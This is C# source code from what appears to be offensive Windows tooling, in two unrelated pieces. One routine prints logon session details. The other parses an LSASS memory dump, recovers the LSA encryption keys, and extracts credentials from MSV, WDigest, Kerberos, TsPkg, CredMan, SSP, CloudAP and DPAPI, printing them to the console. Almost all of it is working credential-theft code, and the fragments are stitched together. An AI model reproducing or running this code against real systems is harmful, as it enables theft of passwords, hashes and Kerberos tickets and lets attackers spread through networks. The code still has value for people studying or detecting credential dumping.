private void PrintLogonSessions()
{
try
{
Beaprint.MainPrint("Print Logon Sessions");
var logonSessions = LogonSessions.GetLogonSessions();
foreach (var logonSession in logonSessions)
{
Beaprint.NoColorPrint($" Method: {logonSession.Method}\n" +
$" Logon Server: {logonSession.LogonServer}\n" +
$" Logon Server Dns Domain: {logonSession.LogonServerDnsDomain}\n" +
$" Logon Id: {logonSession.LogonId}\n" +
$" Logon Time: {logonSession.LogonTime}\n" +
$" Logon Type: {logonSession.LogonType}\n" +
$" Start Time: {logonSession.StartTime}\n" +
$" Domain: {logonSession.Domain}\n" +
$" Authentication Package: {logonSession.AuthenticationPackage}\n" +
$" Start Time: {logonSession.StartTime}\n" +
$" User Name: {logonSession.UserName}\n" +
$" User Principal Name: {logonSession.UserPrincipalName}\n" +
$" User SID: {logonSession.UserSID}\n"
);
Beaprint.PrintLineSeparator();
}
}
catch (Exception)
{
}
}
public static void parse(byte[] bytes)
{
MiniDump minidump = new MiniDump();
using (BinaryReader fileBinaryReader = new BinaryReader(new MemoryStream(bytes)))
{
// parse header && streams
minidump.fileBinaryReader = fileBinaryReader;
minidump.header = Header.ParseHeader(minidump);
List <Streams.Directory.MINIDUMP_DIRECTORY> directories = Streams.Directory.ParseDirectory(minidump);
Parse.parseMM(ref minidump, directories);
//Helpers.PrintProperties(minidump.header);
//Helpers.PrintProperties(minidump.sysinfo);
//Helpers.PrintProperties(minidump.modules);
//Helpers.PrintProperties(minidump.MinidumpMemory64List);
minidump.sysinfo.msv_dll_timestamp = 0;
foreach (ModuleList.MinidumpModule mod in minidump.modules)
{
if (mod.name.Contains("lsasrv.dll"))
{
minidump.sysinfo.msv_dll_timestamp = (int)mod.timestamp;
break;
}
}
// parse lsa
minidump.lsakeys = LsaDecryptor.choose(minidump, lsaTemplate.get_template(minidump.sysinfo));
//Console.WriteLine(Helpers.ByteArrayToString(minidump.lsakeys.iv));
//Console.WriteLine(Helpers.ByteArrayToString(minidump.lsakeys.des_key));
//Console.WriteLine(Helpers.ByteArrayToString(minidump.lsakeys.aes_key));
// parse sessions
minidump.logonlist = LogonSessions.FindSessions(minidump, msv.get_template(minidump.sysinfo));
minidump.klogonlist = KerberosSessions.FindSessions(minidump, (kerberos.get_template(minidump.sysinfo)));
//parse credentials
try
{
Msv1_.FindCredentials(minidump, msv.get_template(minidump.sysinfo));
}
catch (Exception e)
{
Console.WriteLine($"MSV failed: {e.Message}");
}
try
{
WDigest_.FindCredentials(minidump, wdigest.get_template(minidump.sysinfo));
}
catch (Exception e)
{
Console.WriteLine($"WDigest failed: {e.Message}");
}
try
{
Kerberos_.FindCredentials(minidump, kerberos.get_template(minidump.sysinfo));
}
catch (Exception e)
{
Console.WriteLine($"Kerberos failed: {e.Message}");
}
try
{
Tspkg_.FindCredentials(minidump, tspkg.get_template(minidump.sysinfo));
}
catch (Exception e)
{
Console.WriteLine($"TsPkg failed: {e.Message}");
}
try
{
Credman_.FindCredentials(minidump, credman.get_template(minidump.sysinfo));
}
catch (Exception e)
{
Console.WriteLine($"Credman failed: {e.Message}");
}
try
{
Ssp_.FindCredentials(minidump, ssp.get_template(minidump.sysinfo));
}
catch (Exception e)
{
Console.WriteLine($"SSP failed: {e.Message}");
}
//try
//{
// LiveSsp_.FindCredentials(minidump, livessp.get_template(minidump.sysinfo));
//}
//catch (Exception e)
//{
// Console.WriteLine($"LiveSSP failed: {e.Message}");
//}
try
{
Cloudap_.FindCredentials(minidump, cloudap.get_template(minidump.sysinfo));
}
catch (Exception e)
{
Console.WriteLine($"CloudAP failed: {e.Message}");
}
try
{
Dpapi_.FindCredentials(minidump, dpapi.get_template(minidump.sysinfo));
}
catch (Exception e)
{
Console.WriteLine($"Dpapi failed: {e.Message}");
}
foreach (Logon log in minidump.logonlist)
{
try
{
if (log.Wdigest != null || log.Msv != null || log.Kerberos != null || log.Tspkg != null || log.Credman != null || log.Ssp != null || log.LiveSsp != null || log.Dpapi != null || log.Cloudap != null)
{
Console.WriteLine("=====================================================================");
//Helpers.PrintProperties(log);
Console.WriteLine($"[*] LogonId: {log.LogonId.HighPart}:{log.LogonId.LowPart}");
if (!string.IsNullOrEmpty(log.LogonType))
{
Console.WriteLine($"[*] LogonType: {log.LogonType}");
}
Console.WriteLine($"[*] Session: {log.Session}");
if (log.LogonTime.dwHighDateTime != 0)
{
Console.WriteLine($"[*] LogonTime: {Helpers.ToDateTime(log.LogonTime):yyyy-MM-dd HH:mm:ss}");
}
Console.WriteLine($"[*] UserName: {log.UserName}");
if (!string.IsNullOrEmpty(log.SID))
{
Console.WriteLine($"[*] SID: {log.SID}");
}
if (!string.IsNullOrEmpty(log.LogonDomain))
{
Console.WriteLine($"[*] LogonDomain: {log.LogonDomain}");
}
if (!string.IsNullOrEmpty(log.LogonServer))
{
Console.WriteLine($"[*] LogonServer: {log.LogonServer}");
}
}
if (log.Msv != null)
{
Helpers.PrintProperties(log.Msv, "[*] Msv", 4);
}
if (log.Kerberos != null)
{
Helpers.PrintProperties(log.Kerberos, "[*] Kerberos", 4);
}
if (log.Wdigest != null)
{
foreach (WDigest wd in log.Wdigest)
{
Helpers.PrintProperties(wd, "[*] Wdigest", 4);
}
}
if (log.Ssp != null)
{
foreach (Ssp s in log.Ssp)
{
Helpers.PrintProperties(s, "[*] Ssp", 4);
}
}
if (log.Tspkg != null)
{
foreach (Tspkg ts in log.Tspkg)
{
Helpers.PrintProperties(ts, "[*] TsPkg", 4);
}
}
if (log.Credman != null)
{
foreach (CredMan cm in log.Credman)
{
Helpers.PrintProperties(cm, "[*] CredMan", 4);
}
}
if (log.Dpapi != null)
{
foreach (Dpapi dpapi in log.Dpapi)
{
Helpers.PrintProperties(dpapi, "[*] Dpapi", 4);
}
}
if (log.Cloudap != null)
{
foreach (Cloudap cap in log.Cloudap)
{
Helpers.PrintProperties(cap, "[*] CloudAp", 4);
}
}
}
catch (Exception e)
{
Console.WriteLine($"{e.Message}");
}
}
}
}
